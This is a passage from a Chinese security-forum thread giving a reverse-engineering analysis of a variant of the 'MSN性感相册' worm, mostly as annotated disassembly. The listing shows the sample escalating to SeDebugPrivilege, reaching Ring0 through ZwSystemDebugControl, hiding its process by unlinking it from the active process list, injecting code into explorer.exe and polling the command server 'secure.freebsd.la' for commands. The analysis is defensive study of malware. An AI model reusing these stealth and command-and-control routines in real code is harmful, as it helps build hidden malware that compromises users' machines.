|
|
|
|
|
|
|
[原创]蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)
我也喜欢“加精”,呵呵。谢谢支持。 |
|
|
|
[原创]蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)
上传个“蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)”文本文档,方便下载。 由于时间紧,只是大概分析了下,难免有错误的地方,请指正,谢谢! |
|
[原创]蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)
---------------------------------------------------------------------------------------------------- 2、当样本执行恶意操作时的分析: 00402D14 FF15 88804000 CALL DWORD PTR DS:[408088] ; ntdll.RtlGetLastWin32Error(如果s2 == s1,则该病毒程序从这里开始执行恶意操作.) 00402D1A 3D B7000000 CMP EAX,0B7 ; EAX = 0x51D 00402D1F 75 08 JNZ SHORT waccs.00402D29 ; 条件判断. 00402D21 6A 00 PUSH 0 00402D23 FF15 84804000 CALL DWORD PTR DS:[408084] ; kernel32.ExitProcess(不满足条件则关闭退出). 00402D29 8D85 54FCFFFF LEA EAX,DWORD PTR SS:[EBP-3AC] 00402D2F 50 PUSH EAX ; /pWSAData = 0012FC14 00402D30 68 02020000 PUSH 202 ; |RequestedVersion = 202 (2.2.) 00402D35 FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 2.0). 00402D3B 85C0 TEST EAX,EAX ; 判断是否定义成功. 00402D3D 74 1E JE SHORT waccs.00402D5D ; 如果失败则执行下边代码,定义协议WinSock 1.0. 00402D3F 8D85 54FCFFFF LEA EAX,DWORD PTR SS:[EBP-3AC] 00402D45 50 PUSH EAX 00402D46 68 01010000 PUSH 101 00402D4B FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 1.0). 00402D51 85C0 TEST EAX,EAX ; 判断是否定义成功. 00402D53 74 08 JE SHORT waccs.00402D5D ; 如果失败则执行下边代码,关闭退出. 00402D55 6A 01 PUSH 1 00402D57 FF15 84804000 CALL DWORD PTR DS:[408084] ; kernel32.ExitProcess(关闭退出). 00402D5D 8D85 4CFCFFFF LEA EAX,DWORD PTR SS:[EBP-3B4] 00402D63 50 PUSH EAX 00402D64 8D85 B0F9FFFF LEA EAX,DWORD PTR SS:[EBP-650] 00402D6A 50 PUSH EAX 00402D6B 8D85 48FCFFFF LEA EAX,DWORD PTR SS:[EBP-3B8] 00402D71 50 PUSH EAX 00402D72 E8 2D120000 CALL waccs.00403FA4 ; 获得操作系统版本号. 00402D77 83C4 0C ADD ESP,0C 00402D7A 83BD 48FCFFFF 0>CMP DWORD PTR SS:[EBP-3B8],5 ; 规范范围 00402D81 75 31 JNZ SHORT waccs.00402DB4 ; 如果系统版本不符合,则不执行"进程隐藏"操作. 00402D83 83BD B0F9FFFF 0>CMP DWORD PTR SS:[EBP-650],1 ; 规范范围 00402D8A 75 28 JNZ SHORT waccs.00402DB4 ; 如果系统版本不符合,则不执行"进程隐藏"操作. 00402D8C 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402D92 E8 15380000 CALL waccs.004065AC ; 提升自身进程权限为"SeDebugPrivilege"权限,列举进程的内核模块,得到"ntkrnlpa.exe"模块,导出"PsInitialSystemProcess"函数,调用ZwSystemDebugControl进入Ring0. 00402D97 FF15 80804000 CALL DWORD PTR DS:[408080] ; kernel32.GetCurrentProcessId(得到当前进程的ID). 00402D9D 50 PUSH EAX 00402D9E 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402DA4 E8 AC360000 CALL waccs.00406455 ; RRING3下实现进程隐藏(删除活动进程链表实现进程隐藏). 00402DA9 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402DAF E8 E6380000 CALL waccs.0040669A ; 释放内存资源. 00402DB4 68 B581D32E PUSH 2ED381B5 00402DB9 8D8D 70F8FFFF LEA ECX,DWORD PTR SS:[EBP-790] 00402DBF E8 0C030000 CALL waccs.004030D0 ; ASCII "t3x0" 00402DC4 50 PUSH EAX ; ASCII "t3x0" 00402DC5 6A 00 PUSH 0 00402DC7 6A 00 PUSH 0 00402DC9 FF15 7C804000 CALL DWORD PTR DS:[40807C] ; kernel32.CreateMutexA(创建一个互斥体"t3x0"). 00402DCF A3 D4A04000 MOV DWORD PTR DS:[40A0D4],EAX 00402DD4 8D8D 70F8FFFF LEA ECX,DWORD PTR SS:[EBP-790] 00402DDA E8 47F2FFFF CALL waccs.00402026 ; 清除内存数据. 00402DDF 68 BD81D32E PUSH 2ED381BD 00402DE4 8D8D 68F8FFFF LEA ECX,DWORD PTR SS:[EBP-798] 00402DEA E8 E1020000 CALL waccs.004030D0 ; ASCII "t3x0" 00402DEF 50 PUSH EAX 00402DF0 E8 1B270000 CALL waccs.00405510 ;向系统桌面程序“explorer.exe”进程内存空间中注入恶意代码,执行进程守护功能. 00402DF5 59 POP ECX 00402DF6 A3 D8A04000 MOV DWORD PTR DS:[40A0D8],EAX 00402DFB 8D8D 68F8FFFF LEA ECX,DWORD PTR SS:[EBP-798] 00402E01 E8 20F2FFFF CALL waccs.00402026 ; 清除内存数据. 00402E06 68 18010000 PUSH 118 00402E0B 6A 00 PUSH 0 00402E0D 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402E13 50 PUSH EAX 00402E14 E8 21420000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00402E19 83C4 0C ADD ESP,0C 00402E1C 68 10270000 PUSH 2710 00402E21 68 9B15572C PUSH 2C57159B 00402E26 8D8D 5CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7A4] 00402E2C E8 FF020000 CALL waccs.00403130 ; ASCII "$msr" 00402E31 50 PUSH EAX ; /MutexName = "$msr" 00402E32 6A 00 PUSH 0 ; |InitialOwner = FALSE 00402E34 6A 00 PUSH 0 ; |pSecurity = NULL 00402E36 FF15 7C804000 CALL DWORD PTR DS:[40807C] ; kernel32.CreateMutexA 00402E3C 8985 F0FEFFFF MOV DWORD PTR SS:[EBP-110],EAX 00402E42 FFB5 F0FEFFFF PUSH DWORD PTR SS:[EBP-110] 00402E48 FF15 78804000 CALL DWORD PTR DS:[408078] ; kernel32.WaitForSingleObject 00402E4E 2D 02010000 SUB EAX,102 00402E53 F7D8 NEG EAX 00402E55 1BC0 SBB EAX,EAX 00402E57 40 INC EAX 00402E58 8885 64F8FFFF MOV BYTE PTR SS:[EBP-79C],AL 00402E5E 8D8D 5CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7A4] 00402E64 E8 BDF1FFFF CALL waccs.00402026 ; 清除内存数据. 00402E69 0FB685 64F8FFFF MOVZX EAX,BYTE PTR SS:[EBP-79C] 00402E70 85C0 TEST EAX,EAX 00402E72 74 05 JE SHORT waccs.00402E79 00402E74 E8 2F420000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00402E79 8D85 B8FAFFFF LEA EAX,DWORD PTR SS:[EBP-548] 00402E7F 50 PUSH EAX ; /pWSAData = 0012FA78 00402E80 68 02020000 PUSH 202 ; |RequestedVersion = 202 (2.2.) 00402E85 FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 2.0). 00402E8B 83A5 50FCFFFF 0>AND DWORD PTR SS:[EBP-3B0],0 00402E92 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402E94 68 6A2A944C PUSH 4C942A6A 00402E99 8D8D 50F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B0] 00402E9F E8 EC020000 CALL waccs.00403190 ; ASCII "##ghetto##" 00402EA4 50 PUSH EAX ; |src = "##ghetto##" 00402EA5 8D85 85FEFFFF LEA EAX,DWORD PTR SS:[EBP-17B] 00402EAB 50 PUSH EAX ; |dest = 0012FE45 00402EAC E8 EB410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402EB1 83C4 0C ADD ESP,0C 00402EB4 8D8D 50F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B0] 00402EBA E8 B7F1FFFF CALL waccs.00402076 ; 清除内存数据. 00402EBF 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402EC1 68 75F453B3 PUSH B353F475 00402EC6 8D8D 48F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B8] 00402ECC E8 1F030000 CALL waccs.004031F0 ; ASCII "3atsh1t" 00402ED1 50 PUSH EAX ; |src = "3atsh1t" 00402ED2 8D85 9EFEFFFF LEA EAX,DWORD PTR SS:[EBP-162] 00402ED8 50 PUSH EAX ; |dest = 0012FE5E 00402ED9 E8 BE410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402EDE 83C4 0C ADD ESP,0C 00402EE1 8D8D 48F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B8] 00402EE7 E8 EAF0FFFF CALL waccs.00401FD6 ; 清除内存数据. 00402EEC 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402EEE 68 36A1576B PUSH 6B57A136 00402EF3 8D8D 38F8FFFF LEA ECX,DWORD PTR SS:[EBP-7C8] 00402EF9 E8 52030000 CALL waccs.00403250 ; ASCII "##ghetto-s##" 00402EFE 50 PUSH EAX ; |src = "##ghetto-s##" 00402EFF 8D85 B7FEFFFF LEA EAX,DWORD PTR SS:[EBP-149] 00402F05 50 PUSH EAX ; |dest = 0012FE77 00402F06 E8 91410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F0B 83C4 0C ADD ESP,0C 00402F0E 8D8D 38F8FFFF LEA ECX,DWORD PTR SS:[EBP-7C8] 00402F14 E8 CF000000 CALL waccs.00402FE8 ; 清除内存数据. 00402F19 6A 01 PUSH 1 00402F1B 58 POP EAX 00402F1C 85C0 TEST EAX,EAX 00402F1E 0F84 BD000000 JE waccs.00402FE1 00402F24 68 80000000 PUSH 80 ; /maxlen = 80 (128.) 00402F29 68 C8F8D8A9 PUSH A9D8F8C8 00402F2E 8D8D 24F8FFFF LEA ECX,DWORD PTR SS:[EBP-7DC] 00402F34 E8 77030000 CALL waccs.004032B0 ; ASCII "secure.freebsd.la"(骇客定义的远程服务器域名地址,加密存放). 00402F39 50 PUSH EAX ; |src = "secure.freebsd.la" 00402F3A 8D85 E8FDFFFF LEA EAX,DWORD PTR SS:[EBP-218] 00402F40 50 PUSH EAX ; |dest = 0012FDA8 00402F41 E8 56410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F46 83C4 0C ADD ESP,0C 00402F49 8D8D 24F8FFFF LEA ECX,DWORD PTR SS:[EBP-7DC] 00402F4F E8 92EFFFFF CALL waccs.00401EE6 ; 清除内存数据. 00402F54 6A 19 PUSH 19 ; maxlen = 19 (25.) 00402F56 68 24DC4A5C PUSH 5C4ADC24 00402F5B 8D8D 1CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7E4] 00402F61 E8 AA030000 CALL waccs.00403310 ; ASCII "su1c1d3" 00402F66 50 PUSH EAX ; |src = "su1c1d3" 00402F67 8D85 6CFEFFFF LEA EAX,DWORD PTR SS:[EBP-194] 00402F6D 50 PUSH EAX ; |dest = 0012FE2C 00402F6E E8 29410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F73 83C4 0C ADD ESP,0C 00402F76 8D8D 1CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7E4] 00402F7C E8 55F0FFFF CALL waccs.00401FD6 ; 清除内存数据. 00402F81 C785 68FEFFFF 4>MOV DWORD PTR SS:[EBP-198],2646 00402F8B 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402F91 50 PUSH EAX 00402F92 E8 13E1FFFF CALL waccs.004010AA ; 连接骇客远程服务器"http://www.secure.freebsd.la". 00402F97 59 POP ECX 00402F98 0FB6C0 MOVZX EAX,AL 00402F9B 85C0 TEST EAX,EAX 00402F9D 74 32 JE SHORT waccs.00402FD1 ; 判断是否连接成功, 00402F9F 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402FA5 50 PUSH EAX 00402FA6 E8 98E1FFFF CALL waccs.00401143 ; 查找系统中是否运行某些通讯工具(可能会利用这些通讯工具发布广告、进行自我传播以及窃取其帐号密码信息等操作),并构造发送数据包(多种包格式/与骇客远程服务器进行秘密通信). 00402FAB 59 POP ECX 00402FAC 0FB6C0 MOVZX EAX,AL 00402FAF 85C0 TEST EAX,EAX 00402FB1 74 1E JE SHORT waccs.00402FD1 00402FB3 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402FB9 50 PUSH EAX 00402FBA E8 4AE5FFFF CALL waccs.00401509 ; 接收从骇客服务器返回的数据包,根据包中骇客定义好的“指令”执行相应的恶意操作. 00402FBF 59 POP ECX 00402FC0 0FB6C0 MOVZX EAX,AL 00402FC3 85C0 TEST EAX,EAX 00402FC5 74 0A JE SHORT waccs.00402FD1 00402FC7 6A 0A PUSH 0A ; /Timeout = 10. ms 00402FC9 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待10毫秒). 00402FCF ^ EB E2 JMP SHORT waccs.00402FB3 ; 循环执行上边的代码(00402FB3-00402FCF),接收从骇客服务器返回的数据包,根据包中骇客定义好的“指令”执行相应的恶意操作. 00402FD1 68 30750000 PUSH 7530 ; /Timeout = 30000. ms 00402FD6 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待30000毫秒). 00402FDC ^ E9 38FFFFFF JMP waccs.00402F19 ; 循环执行上边的代码(00402F19-00402FDC),进行与骇客指定的远程服务器进行秘密通信(向骇客服务器发送数据包). 00402FE1 E8 C2400000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00402FE6 C9 LEAVE 00402FE7 C3 RETN ; 返回. ---------------------------------------------------------- 获得操作系统版本号: 00403FA4 55 PUSH EBP 00403FA5 8BEC MOV EBP,ESP 00403FA7 81EC 9C000000 SUB ESP,9C 00403FAD C785 64FFFFFF 9>MOV DWORD PTR SS:[EBP-9C],9C 00403FB7 8D85 64FFFFFF LEA EAX,DWORD PTR SS:[EBP-9C] 00403FBD 50 PUSH EAX 00403FBE FF15 B0804000 CALL DWORD PTR DS:[4080B0] ; kernel32.GetVersionExA(获取当前操作系统版本号信息). 00403FC4 85C0 TEST EAX,EAX 00403FC6 75 04 JNZ SHORT waccs.00403FCC ; 判断是否成功. 00403FC8 32C0 XOR AL,AL 00403FCA EB 21 JMP SHORT waccs.00403FED 00403FCC 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00403FCF 8B8D 68FFFFFF MOV ECX,DWORD PTR SS:[EBP-98] 00403FD5 8908 MOV DWORD PTR DS:[EAX],ECX 00403FD7 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] 00403FDA 8B8D 6CFFFFFF MOV ECX,DWORD PTR SS:[EBP-94] 00403FE0 8908 MOV DWORD PTR DS:[EAX],ECX 00403FE2 0FB745 F8 MOVZX EAX,WORD PTR SS:[EBP-8] 00403FE6 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 00403FE9 8901 MOV DWORD PTR DS:[ECX],EAX 00403FEB B0 01 MOV AL,1 00403FED C9 LEAVE 00403FEE C3 RETN ; 返回. 提升自身进程权限为"SeDebugPrivilege"权限,列举进程的内核模块,得到"ntkrnlpa.exe"模块,导出"PsInitialSystemProcess"函数,调用ZwSystemDebugControl进入Ring0: 004065AC 55 PUSH EBP 004065AD 8BEC MOV EBP,ESP 004065AF 81EC 30010000 SUB ESP,130 004065B5 898D D4FEFFFF MOV DWORD PTR SS:[EBP-12C],ECX 004065BB 6A 01 PUSH 1 004065BD E8 E00B0000 CALL waccs.004071A2 ; JMP 到 msvcrt.??2@YAPAXI@Z 004065C2 83C4 04 ADD ESP,4 004065C5 8985 F0FEFFFF MOV DWORD PTR SS:[EBP-110],EAX 004065CB 83BD F0FEFFFF 0>CMP DWORD PTR SS:[EBP-110],0 004065D2 74 13 JE SHORT waccs.004065E7 004065D4 8B8D F0FEFFFF MOV ECX,DWORD PTR SS:[EBP-110] 004065DA E8 A1F7FFFF CALL waccs.00405D80 ; 提升自身进程权限为"SeDebugPrivilege"权限. 004065DF 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX 004065E5 EB 0A JMP SHORT waccs.004065F1 004065E7 C785 D0FEFFFF 0>MOV DWORD PTR SS:[EBP-130],0 004065F1 8B85 D4FEFFFF MOV EAX,DWORD PTR SS:[EBP-12C] 004065F7 8B8D D0FEFFFF MOV ECX,DWORD PTR SS:[EBP-130] 004065FD 8908 MOV DWORD PTR DS:[EAX],ECX 004065FF 8D95 00FFFFFF LEA EDX,DWORD PTR SS:[EBP-100] 00406605 52 PUSH EDX 00406606 8D85 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP-10C] 0040660C 50 PUSH EAX 0040660D 8B8D D4FEFFFF MOV ECX,DWORD PTR SS:[EBP-12C] 00406613 E8 77FDFFFF CALL waccs.0040638F ; 列举进程的内核模块,得到"ntkrnlpa.exe"模块. 00406618 8D8D 00FFFFFF LEA ECX,DWORD PTR SS:[EBP-100] 0040661E 51 PUSH ECX ; /FileName = "ntkrnlpa.exe" 0040661F FF15 40804000 CALL DWORD PTR DS:[408040] ; kernel32.LoadLibraryA(加载"ntkrnlpa.exe"). 00406625 8985 F8FEFFFF MOV DWORD PTR SS:[EBP-108],EAX 0040662B 68 99C8E33A PUSH 3AE3C899 00406630 8D8D D8FEFFFF LEA ECX,DWORD PTR SS:[EBP-128] 00406636 E8 15020000 CALL waccs.00406850 ; ASCII "PsInitialSystemProcess" 0040663B 50 PUSH EAX ; /ProcNameOrOrdinal = "PsInitialSystemProcess" 0040663C 8B95 F8FEFFFF MOV EDX,DWORD PTR SS:[EBP-108] 00406642 52 PUSH EDX ; |hModule = 009B0000 (ntkrnlpa) 00406643 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress(导出"PsInitialSystemProcess"函数). 00406649 8985 FCFEFFFF MOV DWORD PTR SS:[EBP-104],EAX 0040664F 8D8D D8FEFFFF LEA ECX,DWORD PTR SS:[EBP-128] 00406655 E8 C6000000 CALL waccs.00406720 ; 清除内存数据. 0040665A 8B85 FCFEFFFF MOV EAX,DWORD PTR SS:[EBP-104] 00406660 2B85 F8FEFFFF SUB EAX,DWORD PTR SS:[EBP-108] 00406666 0385 F4FEFFFF ADD EAX,DWORD PTR SS:[EBP-10C] 0040666C 50 PUSH EAX 0040666D 8B8D D4FEFFFF MOV ECX,DWORD PTR SS:[EBP-12C] 00406673 8B09 MOV ECX,DWORD PTR DS:[ECX] 00406675 E8 5EF7FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040667A 8B95 D4FEFFFF MOV EDX,DWORD PTR SS:[EBP-12C] 00406680 8942 04 MOV DWORD PTR DS:[EDX+4],EAX 00406683 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00406689 50 PUSH EAX 0040668A FF15 3C804000 CALL DWORD PTR DS:[40803C] ; kernel32.FreeLibrary(卸载对"ntkrnlpa.exe"的调用). 00406690 8B85 D4FEFFFF MOV EAX,DWORD PTR SS:[EBP-12C] 00406696 8BE5 MOV ESP,EBP 00406698 5D POP EBP 00406699 C3 RETN ; 返回. 提升自身进程权限为"SeDebugPrivilege"权限: 00405D80 55 PUSH EBP 00405D81 8BEC MOV EBP,ESP 00405D83 83EC 18 SUB ESP,18 00405D86 894D E8 MOV DWORD PTR SS:[EBP-18],ECX 00405D89 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14] 00405D8C 50 PUSH EAX 00405D8D 6A 28 PUSH 28 00405D8F FF15 C8804000 CALL DWORD PTR DS:[4080C8] ; kernel32.GetCurrentProcess 00405D95 50 PUSH EAX 00405D96 FF15 14804000 CALL DWORD PTR DS:[408014] ; ADVAPI32.OpenProcessToken 00405D9C C745 F0 0100000>MOV DWORD PTR SS:[EBP-10],1 00405DA3 C745 FC 0200000>MOV DWORD PTR SS:[EBP-4],2 00405DAA 8D4D F4 LEA ECX,DWORD PTR SS:[EBP-C] 00405DAD 51 PUSH ECX 00405DAE 68 20A04000 PUSH waccs.0040A020 ; ASCII "SeDebugPrivilege" 00405DB3 6A 00 PUSH 0 00405DB5 FF15 10804000 CALL DWORD PTR DS:[408010] ; ADVAPI32.LookupPrivilegeValueA 00405DBB 6A 00 PUSH 0 00405DBD 6A 00 PUSH 0 00405DBF 6A 10 PUSH 10 00405DC1 8D55 F0 LEA EDX,DWORD PTR SS:[EBP-10] 00405DC4 52 PUSH EDX 00405DC5 6A 00 PUSH 0 00405DC7 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] 00405DCA 50 PUSH EAX 00405DCB FF15 0C804000 CALL DWORD PTR DS:[40800C] ; ADVAPI32.AdjustTokenPrivileges 00405DD1 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] 00405DD4 8BE5 MOV ESP,EBP 00405DD6 5D POP EBP 00405DD7 C3 RETN ; 返回. 列举进程的内核模块,得到"ntkrnlpa.exe"模块: 0040638F 55 PUSH EBP 00406390 8BEC MOV EBP,ESP 00406392 81EC 38010000 SUB ESP,138 00406398 56 PUSH ESI 00406399 57 PUSH EDI 0040639A 898D C8FEFFFF MOV DWORD PTR SS:[EBP-138],ECX 004063A0 C745 FC 2001000>MOV DWORD PTR SS:[EBP-4],120 004063A7 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004063AA 50 PUSH EAX 004063AB 6A 00 PUSH 0 004063AD 6A 00 PUSH 0 004063AF 6A 0B PUSH 0B 004063B1 FF15 F4814000 CALL DWORD PTR DS:[4081F4] ; ntdll.ZwQuerySystemInformation 004063B7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 004063BA 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 004063BD 51 PUSH ECX 004063BE E8 DF0D0000 CALL waccs.004071A2 ; JMP 到 msvcrt.??2@YAPAXI@Z 004063C3 83C4 04 ADD ESP,4 004063C6 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX 004063CC 8B95 D0FEFFFF MOV EDX,DWORD PTR SS:[EBP-130] 004063D2 8955 F4 MOV DWORD PTR SS:[EBP-C],EDX 004063D5 6A 00 PUSH 0 004063D7 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004063DA 50 PUSH EAX 004063DB 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004063DE 51 PUSH ECX 004063DF 6A 0B PUSH 0B 004063E1 FF15 F4814000 CALL DWORD PTR DS:[4081F4] ; ntdll.ZwQuerySystemInformation 004063E7 8B75 F4 MOV ESI,DWORD PTR SS:[EBP-C] 004063EA B9 48000000 MOV ECX,48 004063EF 8DBD D4FEFFFF LEA EDI,DWORD PTR SS:[EBP-12C] 004063F5 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 004063F7 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 004063FA 8995 CCFEFFFF MOV DWORD PTR SS:[EBP-134],EDX 00406400 8B85 CCFEFFFF MOV EAX,DWORD PTR SS:[EBP-134] 00406406 50 PUSH EAX 00406407 E8 9C0D0000 CALL waccs.004071A8 ; JMP 到 msvcrt.??3@YAXPAX@Z 0040640C 83C4 04 ADD ESP,4 0040640F 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00406412 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 00406418 8911 MOV DWORD PTR DS:[ECX],EDX 0040641A 8B85 F2FEFFFF MOV EAX,DWORD PTR SS:[EBP-10E] 00406420 25 FFFF0000 AND EAX,0FFFF 00406425 B9 00010000 MOV ECX,100 0040642A 2BC8 SUB ECX,EAX 0040642C 51 PUSH ECX 0040642D 8B95 F2FEFFFF MOV EDX,DWORD PTR SS:[EBP-10E] 00406433 81E2 FFFF0000 AND EDX,0FFFF 00406439 8D8415 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP+EDX-10C] 00406440 50 PUSH EAX 00406441 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 00406444 51 PUSH ECX 00406445 E8 520D0000 CALL waccs.0040719C ; JMP 到 msvcrt.memcpy 0040644A 83C4 0C ADD ESP,0C 0040644D 5F POP EDI 0040644E 5E POP ESI 0040644F 8BE5 MOV ESP,EBP 00406451 5D POP EBP 00406452 C2 0800 RETN 8 ; 返回. RING3下实现进程隐藏(删除活动进程链表实现进程隐藏): 00406455 55 PUSH EBP 00406456 8BEC MOV EBP,ESP 00406458 83EC 1C SUB ESP,1C 0040645B 894D E4 MOV DWORD PTR SS:[EBP-1C],ECX 0040645E 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406461 8B48 04 MOV ECX,DWORD PTR DS:[EAX+4] 00406464 894D F4 MOV DWORD PTR SS:[EBP-C],ECX 00406467 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040646A C742 08 8800000>MOV DWORD PTR DS:[EDX+8],88 00406471 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406474 C740 0C 8400000>MOV DWORD PTR DS:[EAX+C],84 0040647B 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 0040647E 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406481 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 00406484 52 PUSH EDX 00406485 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406488 8B08 MOV ECX,DWORD PTR DS:[EAX] 0040648A E8 49F9FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040648F 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406492 2B41 08 SUB EAX,DWORD PTR DS:[ECX+8] 00406495 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 00406498 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040649B 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 0040649E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 004064A1 50 PUSH EAX 004064A2 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064A5 8B09 MOV ECX,DWORD PTR DS:[ECX] 004064A7 E8 2CF9FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 004064AC 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064AF 2B42 08 SUB EAX,DWORD PTR DS:[EDX+8] 004064B2 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 004064B5 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004064B8 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX 004064BB 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004064BE 894D E8 MOV DWORD PTR SS:[EBP-18],ECX 004064C1 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064C4 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004064C7 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 004064CA 50 PUSH EAX 004064CB 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064CE 8B09 MOV ECX,DWORD PTR DS:[ECX] 004064D0 E8 03F9FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 004064D5 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064D8 2B42 08 SUB EAX,DWORD PTR DS:[EDX+8] 004064DB 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004064DE 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 004064E1 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004064E4 0348 08 ADD ECX,DWORD PTR DS:[EAX+8] 004064E7 51 PUSH ECX 004064E8 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064EB 8B0A MOV ECX,DWORD PTR DS:[EDX] 004064ED E8 E6F8FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 004064F2 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064F5 2B41 08 SUB EAX,DWORD PTR DS:[ECX+8] 004064F8 8945 EC MOV DWORD PTR SS:[EBP-14],EAX 004064FB 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064FE 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 00406501 0342 0C ADD EAX,DWORD PTR DS:[EDX+C] 00406504 50 PUSH EAX 00406505 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406508 8B09 MOV ECX,DWORD PTR DS:[ECX] 0040650A E8 C9F8FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040650F 3B45 08 CMP EAX,DWORD PTR SS:[EBP+8] 00406512 0F85 82000000 JNZ waccs.0040659A 00406518 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040651B 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] 0040651E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 00406521 50 PUSH EAX 00406522 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406525 8B55 E8 MOV EDX,DWORD PTR SS:[EBP-18] 00406528 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 0040652B 52 PUSH EDX 0040652C 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 0040652F 8B08 MOV ECX,DWORD PTR DS:[EAX] 00406531 E8 C6F8FFFF CALL waccs.00405DFC ; 调用ZwSystemDebugControl进入Ring0. 00406536 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406539 8B55 E8 MOV 